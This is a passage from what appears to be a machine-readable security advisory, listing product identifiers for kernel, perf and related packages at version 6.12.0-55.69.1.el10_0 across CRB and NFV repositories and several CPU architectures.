"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
